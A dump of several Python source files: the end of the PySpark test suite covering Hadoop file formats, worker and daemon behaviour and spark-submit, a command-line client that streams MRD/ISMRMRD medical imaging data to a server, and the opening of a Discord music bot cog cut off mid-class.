def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = sorted(self.sc.sequenceFile(basepath + "/sfmap/").collect())
self.assertEqual(maps, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = sorted(self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
self.assertEqual(result, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
old_dataset = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect())
self.assertEqual(old_dataset, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = zip(x, y)
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_unbatched_save_and_read(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei, len(ei)).saveAsSequenceFile(
basepath + "/unbatched/")
unbatched_sequence = sorted(self.sc.sequenceFile(
basepath + "/unbatched/",
batchSize=1).collect())
self.assertEqual(unbatched_sequence, ei)
unbatched_hadoopFile = sorted(self.sc.hadoopFile(
basepath + "/unbatched/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
batchSize=1).collect())
self.assertEqual(unbatched_hadoopFile, ei)
unbatched_newAPIHadoopFile = sorted(self.sc.newAPIHadoopFile(
basepath + "/unbatched/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
batchSize=1).collect())
self.assertEqual(unbatched_newAPIHadoopFile, ei)
oldconf = {"mapred.input.dir": basepath + "/unbatched/"}
unbatched_hadoopRDD = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=oldconf,
batchSize=1).collect())
self.assertEqual(unbatched_hadoopRDD, ei)
newconf = {"mapred.input.dir": basepath + "/unbatched/"}
unbatched_newAPIHadoopRDD = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=newconf,
batchSize=1).collect())
self.assertEqual(unbatched_newAPIHadoopRDD, ei)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send("\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
daemon = Popen([sys.executable, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(PySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
self.sc.parallelize(range(1)).foreach(sleep)
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
data = open(path).read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(range(100), 1)
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(range(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name + ".zip")
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out)
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = map(gammaln, x)
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
if __name__ == "__main__":
if not _have_scipy:
print "NOTE: Skipping SciPy tests as it does not seem to be installed"
if not _have_numpy:
print "NOTE: Skipping NumPy tests as it does not seem to be installed"
unittest.main()
if not _have_scipy:
print "NOTE: SciPy tests were skipped as it does not seem to be installed"
if not _have_numpy:
print "NOTE: NumPy tests were skipped as it does not seem to be installed"
|
client.py
|
#!/usr/bin/python3
# from server import Server
import argparse
import logging
import datetime
import h5py
import socket
import sys
import ismrmrd
import multiprocessing
from connection import Connection
import time
import os
defaults = {
'address': 'localhost',
'port': 9002,
'outfile': 'out.h5',
'out_group': str(datetime.datetime.now()),
'config': 'default.xml',
'send_waveforms': False
}
def connection_receive_loop(sock, outfile, outgroup, verbose, logfile, recvAcqs, recvImages, recvWaveforms):
"""Start a Connection instance to receive data, generally run in a separate thread"""
if verbose:
verbosity = logging.DEBUG
else:
verbosity = logging.INFO
if logfile:
logging.basicConfig(filename=logfile, format='%(asctime)s - %(message)s', level=verbosity)
logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
else:
logging.basicConfig(format='%(asctime)s - %(message)s', level=verbosity)
incoming_connection = Connection(sock, True, outfile, "", outgroup)
try:
for msg in incoming_connection:
if msg is None:
break
finally:
try:
sock.shutdown(socket.SHUT_RDWR)
except:
pass
sock.close()
logging.debug("Socket closed (reader)")
# Dataset may not be closed properly if a close message is not received
try:
incoming_connection.dset.close()
except:
pass
recvAcqs.value = incoming_connection.recvAcqs
recvImages.value = incoming_connection.recvImages
recvWaveforms.value = incoming_connection.recvWaveforms
def main(args):
# ----- Load and validate file ---------------------------------------------
if (args.config_local):
if not os.path.exists(args.config_local):
logging.error("Could not find local config file %s", args.config_local)
return
dset = h5py.File(args.filename, 'r')
if not dset:
logging.error("Not a valid dataset: %s" % args.filename)
return
dsetNames = dset.keys()
logging.info("File %s contains %d groups:", args.filename, len(dset.keys()))
print(" ", "\n ".join(dsetNames))
if not args.in_group:
if len(dset.keys()) == 1:
args.in_group = list(dset.keys())[0]
else:
logging.error("Input group not specified and multiple groups are present")
return
if args.in_group not in dset:
logging.error("Could not find group %s", args.in_group)
return
group = dset.get(args.in_group)
logging.info("Reading data from group '%s' in file '%s'", args.in_group, args.filename)
# ----- Determine type of data stored --------------------------------------
# Raw data is stored as:
# /group/config text of recon config parameters (optional)
# /group/xml text of ISMRMRD flexible data header
# /group/data array of IsmsmrdAcquisition data + header
# /group/waveforms array of waveform (e.g. PMU) data
# Image data is stored as:
# /group/config text of recon config parameters (optional)
# /group/xml text of ISMRMRD flexible data header (optional)
# /group/image_0/data array of IsmrmrdImage data
# /group/image_0/header array of ImageHeader
# /group/image_0/attributes text of image MetaAttributes
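    # For example, a raw-data file typically lists something like (names illustrative):
    #   /dataset/xml, /dataset/data [, /dataset/waveforms]
    # while an image file lists:
    #   /dataset/xml, /dataset/image_0/{data, header, attributes}, ...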
isRaw = False
isImage = False
hasWaveforms = False
if ( ('data' in group) and ('xml' in group) ):
isRaw = True
else:
isImage = True
imageNames = group.keys()
logging.info("Found %d image sub-groups: %s", len(imageNames), ", ".join(imageNames))
# print(" ", "\n ".join(imageNames))
for imageName in imageNames:
if ((imageName == 'xml') or (imageName == 'config') or (imageName == 'config_file')):
continue
image = group[imageName]
if not (('data' in image) and ('header' in image) and ('attributes' in image)):
isImage = False
if ('waveforms' in group):
hasWaveforms = True
dset.close()
if ((isRaw is False) and (isImage is False)):
logging.error("File does not contain properly formatted MRD raw or image data")
return
# ----- Open connection to server ------------------------------------------
# Spawn a thread to connect and handle incoming data
logging.info("Connecting to MRD server at %s:%d" % (args.address, args.port))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((args.address, args.port))
recvAcqs = multiprocessing.Value('i', 0)
recvImages = multiprocessing.Value('i', 0)
recvWaveforms = multiprocessing.Value('i', 0)
process = multiprocessing.Process(target=connection_receive_loop, args=(sock, args.outfile, args.out_group, args.verbose, args.logfile, recvAcqs, recvImages, recvWaveforms))
process.daemon = True
process.start()
# This connection is only used for outgoing data. It should not be used for
# writing to the HDF5 file as multi-threading issues can occur
connection = Connection(sock, False)
# --------------- Send config -----------------------------
if (args.config_local):
fid = open(args.config_local, "r")
config_text = fid.read()
fid.close()
logging.info("Sending local config file '%s' with text:", args.config_local)
logging.info(config_text)
connection.send_config_text(config_text)
else:
logging.info("Sending remote config file name '%s'", args.config)
connection.send_config_file(args.config)
dset = ismrmrd.Dataset(args.filename, args.in_group, False)
# --------------- Send MRD metadata -----------------------
groups = dset.list()
if ('xml' in groups):
xml_header = dset.read_xml_header()
xml_header = xml_header.decode("utf-8")
else:
logging.warning("Could not find MRD metadata xml in file")
xml_header = "Dummy XML header"
connection.send_metadata(xml_header)
# --------------- Send waveform data ----------------------
# TODO: Interleave waveform and other data so they arrive chronologically
if hasWaveforms:
if args.send_waveforms:
logging.info("Sending waveform data")
logging.info("Found %d waveforms", dset.number_of_waveforms())
for idx in range(0, dset.number_of_waveforms()):
wav = dset.read_waveform(idx)
try:
connection.send_waveform(wav)
except:
logging.error('Failed to send waveform %d' % idx)
else:
logging.info("Waveform data present, but send-waveforms option turned off")
# --------------- Send raw data ----------------------
if isRaw:
logging.info("Starting raw data session")
logging.info("Found %d raw data readouts", dset.number_of_acquisitions())
for idx in range(dset.number_of_acquisitions()):
acq = dset.read_acquisition(idx)
try:
connection.send_acquisition(acq)
except:
logging.error('Failed to send acquisition %d' % idx)
# --------------- Send image data ----------------------
else:
logging.info("Starting image data session")
for group in groups:
if ( (group == 'config') or (group == 'config_file') or (group == 'xml') ):
logging.info("Skipping group %s", group)
continue
logging.info("Reading images from '/" + args.in_group + "/" + group + "'")
for imgNum in range(0, dset.number_of_images(group)):
image = dset.read_image(group, imgNum)
if not isinstance(image.attribute_string, str):
image.attribute_string = image.attribute_string.decode('utf-8')
logging.debug("Sending image %d of %d", imgNum, dset.number_of_images(group)-1)
connection.send_image(image)
dset.close()
connection.send_close()
# Wait for incoming data and cleanup
logging.debug("Waiting for threads to finish")
process.join()
sock.close()
logging.info("Socket closed (writer)")
# Save a copy of the MRD XML header now that the connection thread is finished with the file
logging.debug("Writing MRD metadata to file")
dset = ismrmrd.Dataset(args.outfile, args.out_group)
dset.write_xml_header(bytes(xml_header, 'utf-8'))
dset.close()
logging.info("---------------------- Summary ----------------------")
logging.info("Sent %4d acquisitions | Received %4d acquisitions", connection.sentAcqs, recvWaveforms.value)
logging.info("Sent %4d images | Received %4d images", connection.sentImages, recvImages.value)
logging.info("Sent %4d waveforms | Received %4d waveforms", connection.sentWaveforms, recvWaveforms.value)
logging.info("Session complete")
return
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Example client for MRD streaming format',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('filename', help='Input file')
parser.add_argument('-a', '--address', help='Address (hostname) of MRD server')
parser.add_argument('-p', '--port', type=int, help='Port')
parser.add_argument('-o', '--outfile', help='Output file')
parser.add_argument('-g', '--in-group', help='Input data group')
parser.add_argument('-G', '--out-group', help='Output group name')
parser.add_argument('-c', '--config', help='Remote configuration file')
parser.add_argument('-C', '--config-local', help='Local configuration file')
parser.add_argument('-w', '--send-waveforms', action='store_true', help='Send waveform (physio) data')
parser.add_argument('-v', '--verbose', action='store_true', help='Verbose mode')
parser.add_argument('-l', '--logfile', type=str, help='Path to log file')
parser.set_defaults(**defaults)
args = parser.parse_args()
if args.logfile:
print("Logging to file: ", args.logfile)
logging.basicConfig(filename=args.logfile, format='%(asctime)s - %(message)s', level=logging.WARNING)
logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
else:
print("No logfile provided")
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.WARNING)
if args.verbose:
logging.root.setLevel(logging.DEBUG)
else:
logging.root.setLevel(logging.INFO)
main(args)
|
music.py
|
#!/usr/bin/python
'''
Copyright 2021 fantoro
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from discord.ext import commands
import youtube_dl as ytdl
import discord, threading
async def is_in_voice_channel(ctx):
    return ctx.author.voice is not None and ctx.author.voice.channel is not None
class Music(commands.Cog):
def __init__(self, bot):
